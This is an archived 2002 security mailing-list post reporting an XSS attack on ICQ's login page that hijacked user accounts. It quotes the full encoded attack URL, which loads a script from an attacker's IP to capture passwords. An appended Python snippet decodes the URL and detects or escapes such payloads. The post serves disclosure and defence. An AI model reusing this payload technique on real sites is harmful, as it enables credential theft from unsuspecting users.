[Fwd: XSS on ICQ leading to password compromise]

From: Rafael Coninck Teigao (rafaelat_private)
Date: Mon Dec 02 2002 - 08:29:37 PST


    Moderator:
    	I've sent the following email to bugtraq last week. Haven't seen it on
    the list, but it came to my attention that even more accounts were
    hijacked this way.
    	I'm also sending this to incidents, because I think that maybe some
    administrators are receiving similar complaints from their users and
    could (perhaps) block the XSS pages somehow.
    
    -------- Original Message --------
    From: Rafael Coninck Teigao <rafaelat_private>
    Subject: XSS on ICQ leading to password compromise
    To: SecurityFocus - Bugtraq <bugtraqat_private>
    CC: horvathat_private, ahiat_private, nbsoat_private
    
    Hello, pp.
        I've tried to find some representative from the ICQ technical staff
    but had no success so far.
        Anyway, here's what's happening:
        A friend of mine got the following address on his ICQ from a friend
    on his contact list:
    http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e
    
    We can clearly see the <script... part on it. Unfortunately, he
    couldn't.
        When the page opened, he typed his email address and password. Five
    minutes later he was disconnected from ICQ and was unable to login
    again.
        He then tried to recover his password and saw that it was set to:
    aaaaa
    a
        that's right, it has a new line on it.
        The source on the script is:
    http://200.158.50.245/web/icq.asa
        That IP address comes from an ADSL from Telesp. The date and time of
    the incident were Nov/24 at 20:12 (GMT -2).
    
        He also told me that the friend who sent him the address and another
    person had their accounts hijacked as well.
    
        Best regards,
        Rafael Coninck Teigao
        SafeCore Network Solutions
        http://SafeCore.NET
        +55 41 224 1785
    
    --
    ------------------------------------------------------------------------
    "The only people for me are the mad ones -- the ones who are mad to
    live, mad to talk, mad to be saved, desirous of everything at the same
    time, the ones who never yawn or say a commonplace thing, but burn,
    burn, burn like fabulous yellow Roman candles."
        -- Jack Kerouac, "On the Road"
    ------------------------------------------------------------------------
    
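As an added defender-side illustration (not part of the original message or of ICQ's code): percent-decoding the URL quoted in the report shows the `"></script>` the victim could not see, HTML-escaping shows what the login page should have done before echoing the `karma_err_msg` text, and the same check run over constructed proxy-log lines is one way an administrator could spot such requests. The exact spot where ICQ's page reflected the parameter is not stated in the report and is not assumed here.

```python
from html import escape
from urllib.parse import parse_qsl, urlsplit

# The URL quoted in the report above, exactly as the victim received it.
REPORTED_URL = ("http://web.icq.com/login/login_page/1,,err_sys_busy,00.html"
                "?karma_err_msg==\"%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245"
                "%2Fweb%2Ficq%2Easa\"%3E</script%3e")

# Characters that let a reflected value break out of text or an attribute.
MARKUP_MARKERS = ("<", ">", '"', "'")

def decode_params(url):
    """Percent-decode the query string into {name: value} (one pass, as a
    server-side framework does before handing the value to the page)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))

def flag_markup(params):
    """Names of parameters whose decoded value contains markup characters,
    i.e. would become HTML/script if reflected without escaping."""
    return [n for n, v in params.items() if any(m in v for m in MARKUP_MARKERS)]

def safe_reflect(value):
    """Mitigation: HTML-escape an error message before echoing it into the
    login page, so '<script' and the quotes become inert text."""
    return escape(value, quote=True)

# Constructed proxy-log lines (not from the report): "METHOD URL STATUS".
SAMPLE_LOG = [
    "GET http://web.icq.com/login/login_page/1,,err_sys_busy,00.html"
    "?karma_err_msg=Session%20expired 200",
    "GET " + REPORTED_URL + " 200",
    "GET http://web.icq.com/whitepages/ 200",
]

def suspicious_requests(log_lines):
    """Requests for the login page whose query smuggles markup: the kind of
    traffic an administrator could alert on or block at the proxy."""
    hits = []
    for line in log_lines:
        url = line.split()[1]
        if "/login/" in url and flag_markup(decode_params(url)):
            hits.append(url)
    return hits

if __name__ == "__main__":
    params = decode_params(REPORTED_URL)
    print("decoded:", params["karma_err_msg"])
    print("flagged:", flag_markup(params))
    print("escaped:", safe_reflect(params["karma_err_msg"]))
    print("log hits:", suspicious_requests(SAMPLE_LOG))
```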
    This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 15:30:42 PST